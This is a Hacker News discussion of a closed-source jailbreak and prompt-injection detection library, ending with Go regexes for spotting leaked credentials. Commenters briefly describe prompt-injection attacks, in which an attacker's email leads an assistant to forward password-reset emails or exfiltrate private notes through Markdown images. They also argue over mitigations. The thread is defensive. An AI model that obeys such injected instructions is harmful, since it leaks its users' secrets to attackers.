jailbreak detection

(github.com)

11 points | by last_layer 459 days ago

3 comments

ukuina 459 days ago
This makes it difficult to justify a production deployment:
> The core of last_layer is deliberately kept closed-source for several reasons. Foremost among these is the concern over reverse engineering. By limiting access to the inner workings of our solution, we significantly reduce the risk that malicious actors could analyze and circumvent our security measures. This approach is crucial for maintaining the integrity and effectiveness of last_layer in the face of evolving threats. Internally, there is a slim ML model, heuristic methods, and signatures of known jailbreak techniques.
[-]
- beardedwizard 459 days ago
  So security by obscurity, to defend llms that are routinely exploited from a position of obscurity. This does not inspire confidence. I'm eagerly awaiting second wave of solutions to this problem that don't take a web app firewall approach where context about what is being defended is absent.
- simonw 459 days ago
  Yeah, I don't like this at all. If I'm going to evaluate a prompt injection protection strategy I need to be able to see how it works.
  Otherwise I'm left evaluating it through wasting my time playing whac-a-mole with it, which won't give me the confidence I need because I can't be sure an attacker won't guess a strategy that I didn't think of myself.
  This doesn't even include details of the evals they are using! It's impossible to evaluate whether what they've built is effective or not.
  I'm also not keen on running a compiled .so file released by a group with no information on even who the authors are.
kylebenzle 459 days ago
I DO NOT like this. I do not like this very much. Why work so hard to make a technology less useful.
Like a way to block certain google searches you don't agree with.
[-]
- simonw 459 days ago
  You may be confusing prompt injection with jailbreaking. You should care about prompt injection even if you don't care about jailbreaking:
  https://simonwillison.net/2024/Mar/5/prompt-injection-jailbr...
```
    Prompt injection is a security
    issue. It’s about preventing
    attackers from emailing you and
    tricking your personal digital
    assistant into sending them your
    password reset emails.

    No matter how you feel about “safety
    filters” on models, if you ever want
    a trustworthy digital assistant you
    should care about finding robust
    solutions for prompt injection.
```
  To be fair, this library attempts to solve both at once.
  [-]
  - Zambyte 459 days ago
    You can avoid prompt injection by simply not using LLMs as autonomous agents where the output of the model is critical for security. That sounds like a horrible idea anyways. A language model is the wrong interface between untrusted people and sensitive data
    [-]
    - simonw 459 days ago
      Sure, but there are SO many things people want to build with LLMs that include access to privileged actions and sensitive data.
      Prompt injection means that even running an LLM against your own private notes to answer questions about them could be unsafe, provided there are any vectors (like Markdown image support) that might be used for exfiltration.
      My current recommendation for dealing with prompt injection is to keep it in mind and limit the blast radius if something goes wrong: https://simonwillison.net/2023/Dec/20/mitigate-prompt-inject...
      [-]
      - Zambyte 459 days ago
        Using prompt injection mitigation techniques is akin to directly interfacing untrusted clients to your production database, but just organizing your tables that contain sensitive data in a confusing way in the name of security. If you depend on a language model behaving correctly to avoid leaking sensitive data, you've already leaked the sensitive data.
        Scope the information that the language model has access to to a subset of the information that the person interfacing with the language model has access to. Prompt injection doesn't matter at that point, because the person will only be able to "leak" information they have permission to access anyways.
        [-]
        simonw 459 days ago
        That's not enough. Even if the LLM can only access information that should be visible to the user interacting with it (which I see as table stakes for building anything here) you still have to worry about prompt injection exfiltration attacks.
        More on exfiltration: https://simonwillison.net/search/?q=exfiltration
        [-]
        Zambyte 459 days ago
        Re: exfiltration: just don't do things that untrusted data sources tell you to do. Separate processing the input data from the persons commands, so that the LLM can perform inferencing operations on the data according to the specified commands. The part of the pipeline that processes untrusted data should not have any influence on the behavior of the part of the pipeline capable of interacting with entities who should not have access to the untrusted data.
        Edit: related link: https://python.langchain.com/docs/security
        [-]
        simonw 459 days ago
        "Separate processing the input data from the persons commands, so that the LLM can perform inferencing operations on the data according to the specified commands"
        Prompt injection is the security flaw that exists because doing that - treating instructions and data as separate things in the context in the LLM - is WAY harder than you might expect.
        My previous writing about this: https://simonwillison.net/series/prompt-injection/
        [-]
        Zambyte 459 days ago
        > Prompt injection is the security flaw that exists because doing that - treating instructions and data as separate things in the context in the LLM - is WAY harder than you might expect.
        Then we should improve the tooling around this to make it way easier, rather than hoping security by obscurity will work this time.
        [-]
        simonw 459 days ago
        AI labs around the world have been trying to solve this problem - reliable separation of instructions from data for LLMs - for a year and a half at this point. It's hard.
- ravroid 459 days ago
  You're equating this to censorship, when I think it's more like Google adding security measures so you can't break their search engine rather than removing unfavorable results.
- smokeydoe 459 days ago
  How is it less useful to have more protection from abuse on your LLM service? This is for people implementing their own public products right?
- Conasg 459 days ago
  There's nothing wrong with blocking prompt injection for a customer service chatbot, though. This would be obnoxious applied directly to something like ChatGPT, or worse yet their API, but I don't think that's really the intended use case.
- CuriouslyC 459 days ago
  The technology was always the same amount of useful. This library just lowers the competence floor for exploits. Try to exploit yourself and come up with anti-jailbreak prompts to mitigate the exploits.
thisguyssus 459 days ago
[flagged]
[-]
- last_layer 459 days ago
  Those regex are for Threat.SecretsMarker, the library runs completely offline.
  [-]
  - last_layer 459 days ago
    package x
    import ( "errors" "regexp" )
    type SecretsMarker struct { awsAccessKeyRegex regexp.Regexp awsSecretAccessKeyRegex regexp.Regexp openAIKeyRegex regexp.Regexp claudeKeyRegex regexp.Regexp groqKeyRegex regexp.Regexp slackTokenRegex regexp.Regexp jiraTokenRegex regexp.Regexp githubTokenRegex regexp.Regexp }
    // Init sets up the regular expressions for detecting various credentials func (d SecretsMarker) Init(_ string) error { var err error d.awsAccessKeyRegex, err = regexp.Compile(`(AKIA[0-9A-Z]{16})`) if err != nil { return err }
    d.awsSecretAccessKeyRegex, err = regexp.Compile(`([0-9a-zA-Z/+]{40})`) if err != nil { return err }
    d.openAIKeyRegex, err = regexp.Compile(`(sk-)[0-9a-zA-Z]{32}`) if err != nil { return err }
    // Example pattern for Claude API Key (adjust according to the actual pattern) d.claudeKeyRegex, err = regexp.Compile(`(claude-)[0-9a-zA-Z]{32}`) if err != nil { return err }
    // Example pattern for Groq API Key (adjust according to the actual pattern) d.groqKeyRegex, err = regexp.Compile(`(groq-)[0-9a-zA-Z]{32}`) if err != nil { return err }
    // Slack Token pattern d.slackTokenRegex, err = regexp.Compile(`(xox[abp]-[0-9a-zA-Z]{10,48})`) if err != nil { return err }
    // GitHub Token pattern d.githubTokenRegex, err = regexp.Compile(`(gh[pousr]_[0-9a-zA-Z]{36})`) if err != nil { return err }
    return nil }
    // CheckMarkers inspects the blob for various service credentials func (d SecretsMarker) CheckMarkers(blob string) error { if d.awsAccessKeyRegex.MatchString(blob) || d.awsSecretAccessKeyRegex.MatchString(blob) || d.openAIKeyRegex.MatchString(blob) || d.claudeKeyRegex.MatchString(blob) || d.groqKeyRegex.MatchString(blob) || d.slackTokenRegex.MatchString(blob) || d.githubTokenRegex.MatchString(blob) { return errors.New("detected potential service credentials") } return nil }
  - thisguyssus 459 days ago
    [flagged]